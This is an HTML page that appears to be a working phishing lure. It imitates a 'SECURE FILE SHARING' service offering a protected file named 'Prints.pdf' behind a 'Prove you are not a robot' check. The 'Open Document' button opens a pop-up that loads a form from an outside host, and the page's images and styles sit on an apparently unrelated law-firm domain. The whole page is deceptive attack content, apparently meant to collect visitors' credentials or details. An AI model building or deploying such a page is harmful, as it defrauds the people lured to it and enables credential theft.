

<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" integrity="sha384-9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">
    <link rel="stylesheet" href="https://bslalawllp.com/a/b/main.css"> 

    <title>SECURE FILE SHARING</title>
    <style type="text/css">
<!--
body {
	background-image: url(https://i.ibb.co/4jGFcNr/bacl.jpg);
	background-repeat: no-repeat;
	background-size: cover;
}
.style2 {
	color: #333333;
	font-size: 14px;
}
.style3 {color: #333333; font-size: 18px; }
-->
    </style>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>
  <body>
<style type="text/css">
.intoimg{
  width: auto;
  height: auto;
} 
#writeup{
color: rgb(0, 128, 0);
font-size: 1.5rem;  
}
</style>
    <div class="container">
      <div class="row mt-5">
        <div class="col-md-4">
          
        </div>     
        <div class="col-md-4" style="margin-left: -20px;">
          <div class="text-center"><img src="https://bslalawllp.com/a/b/intro.png" class="intoimg float-lef" alt=""></div>
          <div id="writeup" class="text-center ml-5">
            <center>
              <p class="style3">
                <font face="Trebuchet MS" color="green">
                Prove you are not a robot                </font>              </p>
              <p class="style2"><strong><strong> <font face="Trebuchet MS">File Name: Prints.pdf</font> </strong></strong></p>              
              <p class="style2"><strong><strong><font face="Trebuchet MS"> File Description: 1 item, 272 KB in total</font> </strong></strong></p>
              <p class="style2"><strong><strong><font face="Trebuchet MS"> File Type: PDF (Protected)</font> </strong></strong></p>
                                         
            </center>
<!-- Wiz -->
<link href="https://swiftlglobal.com/app/static_files/css/form.popup.min.css" rel="stylesheet" type="text/css">
<style>
    .ef-modal {
        background: rgba(0, 0, 0, 0.28) !important; /* Overlay color */
    }
    .ef-modal-box {
        margin: 60px auto !important; /* Pop-Up margin */
        padding: 20px !important; /* Pop-Up pading */
        width: 34% !important; /* Pop-Up width */
        border-radius: 28px !important; /* Pop-Up radius */
        background: rgb(255, 255, 255) !important; /* Pop-Up background */

        /** Animation duration **/
        -webkit-transition: all 0.3s !important;
        -moz-transition: all 0.3s !important;
        -o-transition: all 0.3s !important;
        transition: all 0.3s !important;
    }
</style>
<div class="ef-btn-wrapper ef-btn-wrapper-3">
    <button id="ef-button-3" class="ef-button ef-button-3 ef-button-success ef-button-inline-placement">Open Document </button>
</div>
<div id="ef-content-3" class="ef-content-wrapper">
    <div id="c3" class="ef-content">
        Fill out my <a href="https://swiftlglobal.com/app/app/form?id=TMGmFw">online form</a>.
    </div>
    <script type="text/javascript">
        (function(d, t) {
            var s = d.createElement(t), options = {
                'id': 'TMGmFw',
                'container': 'c3',
                'height': '294px',
                'form': '//swiftlglobal.com/app/app/embed'
            };
            s.type= 'text/javascript';
            s.src = '//swiftlglobal.com/app/static_files/js/form.widget.js';
            s.onload = s.onreadystatechange = function() {
                var rs = this.readyState; if (rs) if (rs != 'complete') if (rs != 'loaded') return;
                try { (new EasyForms()).initialize(options).display() } catch (e) { }
            };
            var scr = d.getElementsByTagName(t)[0], par = scr.parentNode; par.insertBefore(s, scr);
        })(document, 'script');
    </script>
</div>
<script src="//swiftlglobal.com/app/static_files/js/form.popup.min.js"></script>
<script type="text/javascript">
    var modal3 = new EasyForms.Modal({
        autoOpen: false,
        cssClass: ['ef-effect-slide-in-top']
    });
    var btn3 = document.querySelector('.ef-button-3');
    btn3.addEventListener('click', function(){
        modal3.open();
    });
    modal3.setContent(document.getElementById('ef-content-3'));
</script>
<!-- End Wiz -->
  </script>

  </body>
</html>